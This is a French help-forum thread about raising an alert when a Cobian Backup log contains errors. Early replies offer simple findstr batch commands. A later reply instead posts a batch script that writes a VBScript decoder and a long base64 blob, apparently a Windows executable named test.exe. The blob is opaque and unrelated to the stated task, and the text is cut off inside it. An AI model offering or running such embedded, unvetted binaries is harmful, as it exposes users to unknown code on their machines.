Batch Index du Forum
S’enregistrerRechercherFAQMembresGroupesConnexion
Répondre au sujet Page 1 sur 1
Ouverture journal en cas d'erreur
Auteur Message
Répondre en citant
Message Ouverture journal en cas d'erreur 
Bonjour à tous,

Je m'adresse à vous car je ne trouve pas de solution précise à mon problème; je vous explique:

Actuellement j'utilise Cobian Backup 11 pour réaliser mes sauvegardes, et ce de façon manuelle (via un .bat) , cependant il s'avère que quelques
fois la sauvegarde échoue. Lorsque cela se produit je ne suis pas alerté mais le/les erreur/s sont bien inscrites dans le log.

L'idéal serait de pouvoir automatisé l'ouverture du log ou un message d'avertissement (voir les deux) en cas d'erreur de sauvegarde.
Le problème c'est que le fichier log change à chaque sauvegarde de nom en fonction de la date > Log AAAA-MM-JJ.txt.
En cas d'erreur, le log créé comporte le mot "impossible", peut-être une piste pour cibler les logs avec erreur(s).

Voici le bat de lancement du programme :

Code:

@echo off
Color 0E
echo %date% %time%
echo -------------------------------
echo   SAUVEGARDE EN COURS
echo Veuillez ne pas interrompre le processus
"C:\Program Files (x86)\Cobian Backup 11\cobian.exe" -autoclose -bu
echo   SAUVEGARDE TERMINEE
Color 1F
pause 

Je vous joins en pièce jointe un log avec erreur.

Merci

Message Publicité 
PublicitéSupprimer les publicités ?

Répondre en citant
Message Re: Ouverture journal en cas d'erreur 
salut , tu pourais utiliser la commande "findstr" , genre;

Code:
 findstr "impossible" C:\...\ Log AAAA-MM-JJ.txt 

et si il trouve faire:
Code:
 echo. error

puis start "ton-programme de sauvegarde"

ou encore faire
Code:
 @echo off
cd C:\Program Files (x86)\Cobian Backup 11\Logs
type *.txt
pause 

et regarder toi meme si il y a un probleme

j'espere que ça te fera avancer , je peux essayer de faire le code stv Mr. Green (c'est la premiere fois que je post pour aider )
salut Okay Okay

Merci pour cette réponse rapide  Exclamation

Je test ça dans le journée, au plus tard ce soir et je te tiens au jus.

Et merci encore. Okay

Répondre en citant
j'ai un peu bossé sur le sujet , tu as quoi toi ?

Yop !!

Désolé de te faire attendre désespérément  Rolling Eyes
Je viens de tester rapidement alors je pense que tu es sur la bonne voie Okay , en effet le log s'ouvre bien à condition qu'il n'y est qu'un log.
Si plusieurs logs sont présents je pense que tous s'ouvrent dans la fenêtre CMD.

Admettons qu'un seul log soit présent c'est techniquement possible je crois pouvoir n'en conserver qu'un seul, j'aimerais qu'une alerte ou un message
m'avertisse seulement en cas d'erreur.
 Effectivement le moyen que tu proposes donne cette information, cependant il est nécessaire de faire une lecture complète de ton log qui s'affiche.

En tout cas très bonne idée le fait de pointer le fichier .txt je bloquais sévèrement sur le changement de nom mais si il n'y plus qu'un seul log c'est top.

Merci pour ton aide, elle est appréciée et je m'excuse pour hier de ne pas t'avoir répondu plus vite, je n'aime pas faire attendre les gens qui souhaitent m'aider Rolling Eyes

Répondre en citant
Alors pour faire suite, voila ce que j'ai trouvé sur le net :

Code:
@echo off
findstr /m "impossible" *.txt > results.txt
if %errorlevel%==0 (
echo Found! logged files into results.txt
) else (
echo No matches found
)
pause

Mais le résultat n'est pas bon puisque dans le cas ou le mot "impossible" est présent ou non c'est toujours pareil...

Je pense que si cette commande finie par fonctionner j'essaierai de l'adapter pour ne pas avoir un fichier texte (results.txt) mais une alerte visuelle immédiate.

Je continue mes recherches, si quelqu'un à une idée évidemment je suis preneur.

Merci

Répondre en citant
J'ai très certainement la solution ! Je te fais ća des que possible ! T'auras même une notification Windows Okay
Slt

re !

je me suis penché sur le sujet et j'ai fais ça !
Code:

@echo off
:sauv
Color 0E
echo %date% %time%
echo   SAUVEGARDE EN COURS
echo Veuillez ne pas interrompre le processus

:build-test.exe
if not exist test.exe call:build
exit/b
:Build
Echo Xoo64Encoder By SachaDee
Echo Traitement en Cours !!!
(echo option explicit
echo Dim inByteArray, base64Decoded, outByteArray,InputFile,OutFile,FSO, oFile,strData
echo InputFile = "B64TMP.txt"
echo OutFile = "test.exe"
echo Set FSO = CreateObject("Scripting.FileSystemObject"^)
echo Set oFile = FSO.OpenTextFile(InputFile^)
echo strData = oFile.ReadAll
echo oFile.Close
echo base64Decoded = decodeBase64(strData^)
echo writeBytes outFile, base64Decoded
echo    private function decodeBase64(base64^)
echo dim DM, EL
echo Set DM = CreateObject("Microsoft.XMLDOM"^)
echo Set EL = DM.createElement("tmp"^)
echo  EL.DataType = "bin.base64"
echo  EL.Text = base64
echo  decodeBase64 = EL.NodeTypedValue
echo end function
echo  private Sub writeBytes(file, bytes^)
echo    Dim binaryStream
echo    Set binaryStream = CreateObject("ADODB.Stream"^)
echo       binaryStream.Type = 1
echo       binaryStream.Open
echo       binaryStream.Write bytes
echo       binaryStream.SaveToFile file, 2
echo       End Sub
echo wscript.quit
)>test.exe.vbs
(
set /p =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
set /p =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